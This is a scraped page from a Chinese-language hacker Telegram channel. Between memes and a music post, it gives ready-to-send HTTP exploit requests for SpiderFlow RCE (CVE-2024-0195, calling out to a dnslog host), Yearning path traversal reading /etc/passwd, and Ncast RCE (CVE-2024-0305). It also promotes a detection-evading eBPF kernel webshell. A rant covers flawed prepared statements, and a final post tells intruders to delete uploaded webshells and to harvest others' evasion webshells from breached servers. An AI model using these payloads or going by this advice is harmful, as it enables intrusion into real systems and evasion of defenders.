踹哈公寓 – Telegram
踹哈公寓
4.11K subscribers
589 photos
19 videos
307 files
357 links
Download Telegram
Channel photo updated
Channel name was changed to «🐉黑客龙图基地🐉»
xray 1.95 高级版
SpiderFlow爬虫平台远程命令执行漏洞(CVE-2024-0195)


POST /function/save HTTP/1.1Host: 192.168.40.130:8088User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Connection: closeContent-Length: 121Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestid=1&name=cmd&parameter=rce&noscript=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

dns平台收到ping请求记录则说明存在漏洞
Yearning front 任意文件读取漏洞

app="Yearning"

GET /front/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd HTTP/1.1Host: your-ipUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate
新型内核马

无进程、无端口、无文件(注入后文件可删除)执行命令不会新建shell进程,无法通过常规行为检测

将WebShell注入内核,无法通过常规内存检测可改造内核马,适配HTTP协议以外的所有协议

通过ebpf hook入/出口流量,筛选出特定的恶意命令。再通过hook execve等函数,将其他进程正常执行的命令替换为恶意命令,达到WebShell的效果

项目地址:https://github.com/veo/ebpf_shell
http://47.100.228.108/

webshell在线检测
🔥1
一等情事
许一鸣
「一等情事」- 许一鸣
专辑: 一等情事
#网易云音乐 #flac 21.42MB 829.12kbps
via @Music163bot
这勾巴是啊啥这是中国人写的吗
CVE-2024-0305 Ncast盈可视高清智能录播系统busiFacade RCE漏洞

app="Ncast-产品" && noscript=="高清智能录播系统"

POST /classes/common/busiFacade.php HTTP/1.1Host: 192.168.40.130:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Connection: closeContent-Length: 154Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequest%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
Channel photo updated
Channel name was changed to «💰30000≈1200=17💰»
无敌黑客网安孙笑川helen在加入本群时惨遭禁言,原因是做错了入群验证的二十以内加减法
😁9
https://v.douyin.com/iLrKUnE9/

你伦哥的直播间,进去第一眼就看到这个b匿名者面具,配合这个打光把我尿都吓出来了,谁家恐怖片特写

我去,这不是我们法环里的王室幽魂吗,怎么都火到网络安全圈去了🤣

小时候看这一集释放黄金树恢复了
👍2😁1
🥰8👍2
预编译这个东西很多人都听说过,每次问到sql注入怎么防御的时候大家都会来一句“使用预编译语句”,具体怎么写也不知道。然后某些记了俩菜名就在qq上蹦跶的带黑客似乎觉得,预编译就是个无敌的存在,sql语句只要这么处理了就没漏洞了。这个说法有道理但是不绝对。之前在审一些代码,尤其是php的时候我发现大多数出注入漏洞的预编译语句都有一种共同的思想,我编译我的,你注入你的。我写代码规定PDO,$pdo->quote($xxx)的时候我是你爹,传入个外部可控的转义字符串的时候经常就反转了,你是我爹。你要拿大哥刷经验,哥没意见,你要质疑大哥的实力,哥不高兴。我个人感觉预编译其实是最好审计出注入的,只要你追着变量一行一行跟进函数就行,反正总有一行什么query什么MB_userKey要出事,你预了你妈呢折腾半天还不如开局$id=$_GET['user_id']然后intval()算了,要死也死痛快点。(这玩意注入是注入不了但是容易正常用户卡bug,cjb开发写php的时候搞不清转换后的进制)

哦对,说回qq。phtml那个文件就不说了字面意思的杂种,满屏刀乐混着标签属性和√⑩缩进写得跟小儿麻痹一样。原理其实网上也有很多文章分析过,扒拉了一个典型代码如图。GET方式获取user_id,然后一个try-catch 块,捕获异常,创建$pdo(这就是个例子别管什么root root弱口令)。然后他的预编译,$sql="select * from dvwa.users where user_id={$id}";正常的,预编译也预了。关键就是后面$row=一句,前面id变量是从 GET 请求中获取到的用户参数,外部可控,这里直接将结果赋值给变量 $row,没过滤,你预了个牛魔。占位符替代参数值,先编译,再传值,这三点都做对了才能叫真正的用预编译处理sql语句,否则就是个在第一行死和第十行死的问题

然后最经典的就来了,qq嗨黑搁那xjb嘴硬爆出了超级经典名言,“不同的数据库注入方法是不一样的,你这个说的是mysql,我用mssql或者sqlsever预编译你注入个啥?”

倭瓜说的,在快手和qq上搜黑客等于进了弱智吧,我是非常认可的。高情商:mssql和sqlsever的关系就像玛丽卡和拉达冈的关系一样。低情商:傻逼初中生啥都不会就会报菜名,听了一堆什么“sql注入不同的数据库注入方式不同”,“预编译防止注入”,“关系型数据库”,“mysql”,“mssql”,“sqlsever”就搁那报呢,连我用mssql或者sqlsever预编译这种逆天发言都出来了,一眼丁真,知道这个词然后压根不知道具体啥意思就开始给劲瞎扯名词。扫哥虽然技术含量上简单但是人家是真能日站有作用,啥都没学过的能不能就⑧瞎扯代码审计了爆些典出来笑死个人😅
👍7
提示一下各位师傅,黑产哥,src刷榜哥,扫哥,传完马子记得删

首先打国内网站传webshell,抓到你跳到黄河里都洗不清的

其次我现在也养成习惯了,什么webshell免杀,绕过,压根不自己做,也不学,打开蚁剑路径下面几十个其他人传的jsp文件,排除test和扫描器的随机字符串轻松收获好几个无敌免杀大🐴子,直接狠狠保存了

目前靠这个方法收获webshell,php6个,asp1个,jsp3个,全都能过d盾或者牧云

不想自己辛苦研究的免杀成果被人白嫖请一定记得删马哦
👍12🤣4